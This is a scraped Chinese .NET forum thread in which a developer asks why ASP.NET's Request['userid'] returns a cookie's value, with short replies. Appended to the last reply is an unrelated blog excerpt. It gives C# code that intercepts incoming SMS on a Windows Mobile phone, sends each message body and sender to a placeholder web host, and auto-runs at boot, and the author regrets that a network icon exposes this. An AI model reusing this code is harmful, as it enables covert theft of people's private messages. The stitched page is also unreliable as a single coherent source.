=======Request一个很奇怪的问题,有木有啊,有木有啊,有木有这么奇怪?=======

你猜我猜不猜拉 2011-06-20 09:05:37
我登陆的时候往客户端写了一个名为userid的cookies 代码如下

String key = HttpContext.Current.Server.UrlEncode("userid");
String valueString = HttpContext.Current.Server.UrlEncode("11");
HttpCookie cookie = new HttpCookie(key, valueString);
cookie.Expires = System.DateTime.Now.AddMinutes(8);

然后系统正好有个页面需要Rquerst一个也是名为userid的参数,这个userid是通过ajax传的一个值,并非是想获得cookies的userid

url:"test.aspx?userid=135"


页面里我是这样写的:

String uid = Request["userid"]==null?"":Request["userid"].ToString();
if(uid=="")
Response.Write("a");
else
Response.Write("b");


结果ajax在没传值userid的情况下,竟然也能获取到值,踪调试发现这个值是我userid cookies的值!!!!!!

怎么这么奇怪啊?获取客户端cookies不是这样写的吗?

HttpContext.Current.Request.Cookies.Get("userid").Value


怎么Request["userid"]获得是cookies了???????
...全文
62 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
  • 打赏
  • 举报
回复
[Quote=引用 4 楼 lml926it 的回复:]

你想要什么效果
[/Quote]

汗,我想要什么效果。。。。我是想问 怎么Rquest获得的是cookies
lml926it 2011-06-20
  • 打赏
  • 举报
回复
你想要什么效果
  • 打赏
  • 举报
回复
求高手!
ziyeage 2011-06-20
  • 打赏
  • 举报
回复
搬凳子学习。这个问题倒没发现过。理论上应该是不可能的。。。
newdigitime 2011-06-20
  • 打赏
  • 举报
回复

加一句:
Response.AppendCookie(cookie);
或者
Response.Cookies.Add(cookie);


http://blog.csdn.net/xiaoxiao108/article/details/6680605 开发环境 vs2008 wm6 .net cf 3.5 1、读取系统的新短信 2、把短信内容保存下来 3、程序开机后自动运行。 具体实现代码 1.订阅MessageReceived事件,收到短信后执行RevMsg_MessageReceived方法处理短信 private MessageInterceptor RevMsg; private void MessageService() { RevMsg = new MessageInterceptor(); RevMsg.MessageReceived += new MessageInterceptorEventHandler(RevMsg_MessageReceived); } 2.短信处理方法 可以把短信内容保存到指定链接,也可以保存到手机txt文件中 HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://www.xxxxxxxxx.com/xxxx?nr=" + msg.Body.ToString() + "&ld=" + msg.From.ToString()); HttpWebResponse response = (HttpWebResponse)request.GetResponse(); Stream stream = response.GetResponseStream(); string WebContent = new StreamReader(stream, System.Text.Encoding.Default).ReadToEnd(); stream.Close(); response.Close(); 3.实现开机自动运行功能 打包cab文件时,只需把快捷方式添加到Startup文件夹下面就ok。 不足之处:把短信内容保存到web时,会开启手机的 edge功能,手机上面有个联网的E通知图标,2分钟后才会关闭,没找到能快速关闭EDGE网络图标的方法。 如果你发现有什么不合理的,需要改进的地方,联系328452421@qq.com 朱晓 。相互交流 谢谢 下载地址 顺便问下 有家是 新泰 的 有木有。 http://blog.csdn.net/xiaoxiao108/article/details/6680605

62,047

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧